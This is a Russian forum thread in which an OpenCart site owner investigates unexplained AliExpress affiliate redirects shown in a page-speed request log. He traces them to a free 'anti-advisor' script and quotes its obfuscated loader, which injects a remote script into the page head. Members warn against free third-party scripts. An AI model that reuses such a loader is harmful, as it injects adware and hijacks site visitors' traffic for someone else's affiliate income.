Вирус? ALIEXPRESS

kolek5520 · December 21, 2017

Добрый день всем.
Гонял сайт через сервис http://www.webpagetest.org

и заметил, среди запросов, странные ведущие на ALIEXPRESS И com-sale.ru

Спойлер


+ Request 176: https://passport.alibaba.com/jump.htm?toURL=http%3A%2F%2Fs.click.aliexpress.com%2Fe%2FZJmQJiA
- Request 177: http://s.click.aliexpress.com/e/ZJmQJiA
URL: http://s.click.aliexpress.com/e/ZJmQJiA
Host: s.click.aliexpress.com
IP: 104.81.62.228
Error/Status Code: 302
Priority: VeryHigh
Protocol: http/1.1
Initiated By: http://com-sale.ru/page/index.php?id=1 line 0
Client Port: 42588
Request Start: 10.142 s
DNS Lookup: 30 ms
Initial Connection: 29 ms
Time to First Byte: 279 ms
Bytes In (downloaded): 0.0 KB
Bytes Out (uploaded): 0.9 KB
Request Headers:

GET /e/ZJmQJiA HTTP/1.1
Host: s.click.aliexpress.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 PTST/171219.181244
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ali_apache_id=10.83.238.12.1513854934920.174641.2; xman_us_f=x_l=0&x_locale=ru_RU; intl_locale=ru_RU; aep_usuc_f=region=RU&site=rus&b_locale=ru_RU&c_tp=RUB; xman_t=F9YbP/lSCzgPr+7ppBEF+LMx+SGa5SQswoo5fpnHSrcP2Ae/Ns90QGmajS+8v961; acs_usuc_t=acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; intl_common_forever=EHsqcZ9jWDOZwDyDP7U0y0b/waIXjuzZs4YilNI2JzEpjgrgjR7RfA==; xman_f=tA8OW6neH5aj7dRBKZslhg8SKBFHmiy6pvtOJI6LHYID8bYPYMCpBL8hgJdIUypUuXO6GcNYYay81csJPG5KTC+aYpBpDIYyjDbxv+NmZTXmcJXEdmpYaw==
Response Headers:

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
P3P: CP="CAO PSA OUR"
X-Application-Context: affiliateclick:prod,production:7001
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Location: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Content-Language: en-US
Server: Tengine/Aserver
Timing-Allow-Origin: *
Date: Thu, 21 Dec 2017 11:15:36 GMT
Connection: keep-alive
Set-Cookie: xman_us_f=x_locale=ru_RU&x_l=0&x_as_i=%7B%22cv%22%3A%221%22%2C%22tp1%22%3A%22comsale%22%2C%22src%22%3A%22promotion%22%2C%22af%22%3A842956180%2C%22cpt%22%3A1513854936600%2C%22channel%22%3A%22AFFILIATE%22%2C%22affiliateKey%22%3A%22ZJmQJiA%22%2C%22cn%22%3A%2210004940010%22%2C%22tagtime%22%3A1513854936606%2C%22vd%22%3A%2230%22%7D; Domain=.aliexpress.com; Expires=Tue, 08-Jan-2086 14:29:43 GMT; Path=/
Set-Cookie: acs_usuc_t=x_csrf=dylis5otzb08&acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; Domain=.aliexpress.com; Path=/
Set-Cookie: aeu_cid=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA; Domain=.aliexpress.com; Expires=Tue, 08-Jan-2086 14:29:43 GMT; Path=/
- Request 178: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
URL: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Host: ru.aliexpress.com
IP: 104.81.232.172
Error/Status Code: 301
Priority: VeryHigh
Protocol: http/1.1
Initiated By: http://com-sale.ru/page/index.php?id=1 line 0
Client Port: 48324
Request Start: 10.452 s
Time to First Byte: 212 ms
Bytes In (downloaded): 0.3 KB
Bytes Out (uploaded): 1.6 KB
Request Headers:

GET /af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5 HTTP/1.1
Host: ru.aliexpress.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 PTST/171219.181244
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ali_apache_id=10.83.238.12.1513854934920.174641.2; JSESSIONID=3Q2KZA0W-TJ3RYODNMH5ABTJ7KWCM1-NP35EGBJ-2H; intl_locale=ru_RU; aep_usuc_f=region=RU&site=rus&b_locale=ru_RU&c_tp=RUB; xman_t=F9YbP/lSCzgPr+7ppBEF+LMx+SGa5SQswoo5fpnHSrcP2Ae/Ns90QGmajS+8v961; intl_common_forever=EHsqcZ9jWDOZwDyDP7U0y0b/waIXjuzZs4YilNI2JzEpjgrgjR7RfA==; xman_f=tA8OW6neH5aj7dRBKZslhg8SKBFHmiy6pvtOJI6LHYID8bYPYMCpBL8hgJdIUypUuXO6GcNYYay81csJPG5KTC+aYpBpDIYyjDbxv+NmZTXmcJXEdmpYaw==; _mle_tmp0=eNrz4A12DQ729PeL9%2FV3cfUxiKjOTLFSMg408o5yNAjXDfEyDor0d%2FHz9TB1dArxMvcOd%2FY11PULMDZ1dXfy0jXyUNJJLrEyNDU0tjA1sTQ2NTA11ElMRhPIrbAyqI0CAP7gG7k%3D; xman_us_f=x_locale=ru_RU&x_l=0&x_as_i=%7B%22cv%22%3A%221%22%2C%22tp1%22%3A%22comsale%22%2C%22src%22%3A%22promotion%22%2C%22af%22%3A842956180%2C%22cpt%22%3A1513854936600%2C%22channel%22%3A%22AFFILIATE%22%2C%22affiliateKey%22%3A%22ZJmQJiA%22%2C%22cn%22%3A%2210004940010%22%2C%22tagtime%22%3A1513854936606%2C%22vd%22%3A%2230%22%7D; acs_usuc_t=x_csrf=dylis5otzb08&acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; aeu_cid=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA
Response Headers:

HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 286
Location: https://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Server: Tengine/Aserver
Timing-Allow-Origin: *
Date: Thu, 21 Dec 2017 11:15:36 GMT
Connection: keep-alive
+ Request 179: https://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
+ Request 180: https://mc.yandex.ru/webvisor/25275842?wmode=0&rn=486342043&page-url=https%3A%2F%2F1mango.ru%2F&wv-type=2&wv-hit=585454435&wv-part=1&browser-info=ti%3A8%3Aet%3A1513854936%3Av%3A929%3Az%3A60%3Ai%3A20171221121534%3Ast%3A1513854937%3Au%3A1513854934737472983
+ Request 181: https://ru.aliexpress.com/af/category/202000020.html?sk=ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5&cpt=1513854936600&blanktest=0&origin=n&jump=afs&aff_platform=promotion&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&CatId=202000020&catName=consumer-electronics

Edited December 21, 2017 by kolek5520

Shureg · December 21, 2017

Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу.

kolek5520 · December 21, 2017

5 минут назад, Shureg сказал:

Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу.

зря вы так, у меня не одного варезного модуля или темы нету - все до единого куплены. А ссылки не вставляю,т.к. в своё время подобная ссылка была проиндексироанная и по запросу моего сайта в поиске вылазила ссылка на этот форум с разбором тех или иных проблем.

https://yadi.sk/i/9F81yE0H3Qpf4q - не считая покупок на https://https://opencartforum.com/files// и https://www.opencart.com/

markimax · December 21, 2017

15 минут назад, Shureg сказал:

Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу.

Кстати зря вы так, @kolek5520 лояльный пользователь и не замечен в варезе
Просто сейчас часто втихаря ломают сайты и всовывают adware, скрытые майнеры, и другую разную фигню
Даже разные дискусы и тп всовывают разную хрень
Это как эпидемия

Shureg · December 21, 2017

17 минут назад, kolek5520 сказал:

зря вы так, у меня не одного варезного модуля или темы нету - все до единого куплены. А ссылки не вставляю,т.к. в своё время подобная ссылка была проиндексироанная и по запросу моего сайта в поиске вылазила ссылка на этот форум с разбором тех или иных проблем.

https://yadi.sk/i/9F81yE0H3Qpf4q - не считая покупок на https://https://opencartforum.com/files// и https://www.opencart.com/

Прошу прощения за подозрения, рад, что неправ.
Увы, слишком часто "секретность" именно "варезностью" обусловлена. У вас, к тому же, даже на картинке ссылки не найти, а была бы нелишней

kolek5520 · December 21, 2017

https://developers.google.com/speed/pagespeed/insights тоже ругается на какие то не сжатые картинки с https://ae01.alicdn.com

https://yadi.sk/i/mWeO4CUi3QphH8

В общем кто с этим знаком и может помочь, напишите в личку - не бесплатно конечно

kolek5520 · December 21, 2017

1 час назад, markimax сказал:

Кстати зря вы так, @kolek5520 лояльный пользователь и не замечен в варезе
Просто сейчас часто втихаря ломают сайты и всовывают adware, скрытые майнеры, и другую разную фигню
Даже разные дискусы и тп всовывают разную хрень
Это как эпидемия

нашел эту заразу. Ставил скрипт против яндекс советника: https://deadviser.ru/

<script type="text/javascript" async> (function () { var j = document.createElement("script"); j.type = "text/javascript"; j.src = "https://"+"deadvi"+"ser.ru/free/?"+Math.random(); document.getElementsByTagName('head')[0].appendChild(j); })(); </script>

убрал, сразу всё норм стало, вернул - сразу https://ae01.alicdn.com полезло.

Так что осторожнее с этим

markimax · December 21, 2017

1 час назад, kolek5520 сказал:
нашел эту заразу. Ставил скрипт против яндекс советника: https://deadviser.ru/
<script type="text/javascript" async> (function () { var j = document.createElement("script"); j.type = "text/javascript"; j.src = "https://"+"deadvi"+"ser.ru/free/?"+Math.random(); document.getElementsByTagName('head')[0].appendChild(j); })(); </script>
убрал, сразу всё норм стало, вернул - сразу https://ae01.alicdn.com полезло.

Так что осторожнее с этим

Как я и предполагал

Мудаки одним словом
Написано FREE
А на самом деле Adware

markimax · December 21, 2017

Ребята, не вставляйте разную "бесплатную" хрень откуда попало
99.9% туда или майнер скрытый засунут, adware или маркетинговую следилку
Относится это ко всему и к разным дискусам и т п

pimur · December 21, 2017

А я отписывал в теме про Яндекс советника тут на форуме, что все чужие скрипты Кик советник и т.д это сегодня помогают Вам, завтра будут против Вас)

Отправлено через Tapatalk

kolek5520 · December 21, 2017

36 минут назад, pimur сказал:

А я отписывал в теме про Яндекс советника тут на форуме, что все чужие скрипты Кик советник и т.д это сегодня помогают Вам, завтра будут против Вас)

Отправлено через Tapatalk

а как быть тогда с этим советником? как его убрать?

pimur · December 21, 2017

2 часа назад, kolek5520 сказал:

а как быть тогда с этим советником? как его убрать?

Уберите разметку с цены, подмена цены и т.д

Sign In

Вирус? ALIEXPRESS

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Create an account or sign in to comment

Create an account

Sign in

Similar Content

Recently Browsing 0 members

Покупателям

Разработчикам

Полезная информация

Последние дополнения

Important Information